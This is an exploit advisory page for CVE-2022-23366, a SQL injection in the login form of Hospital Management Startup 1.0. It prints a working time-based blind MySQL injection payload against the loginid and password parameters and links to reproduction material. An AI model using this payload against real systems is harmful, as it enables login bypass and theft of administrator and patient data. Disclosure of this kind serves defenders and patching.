Home Tools Exploits & CVE's Hospital Management Startup 1.0 SQL Injection

Hospital Management Startup 1.0 SQL Injection

February 13, 2022

624

Hospital Management Startup version 1.0 suffers from a remote SQL injection vulnerability.

advisories | CVE-2022-23366

## Title: Hospital Management Startup v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.10.2022
## Vendor: https://github.com/kabirkhyrul
## Software: https://github.com/kabirkhyrul/HMS
## CVE-2022-23366

## Description:
The loginid and password parameters from Hospital Management Startup
1.0 appear to be vulnerable to SQL injection attacks.
The attacker can retrieve all information from the administrator
account of the system and he can use the information for malicious
purposes!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!

Status: CRITICAL


[+] Payloads:

```mysql
---
Parameter: loginid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
'sDHP'='sDHP&rememberme=on&submit=Login
---

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366)

## Proof and Exploit:
[href](https://streamable.com/hri9eo)

Hospital Management Startup 1.0 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

PrusaSlicer 2.6.1 Arbitrary Code Execution

AMPLE BILLS 0.1 SQL injection

WBCE 1.6.0 SQL Injection

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Trojan.Win32.Jorik.qje Insecure Permissions

WordPress Charitable Donations Plugin And Fundraising Platform 1.7.0.12 Privilege Escalation

Backdoor.Win32.Agent.afq Heap Corruption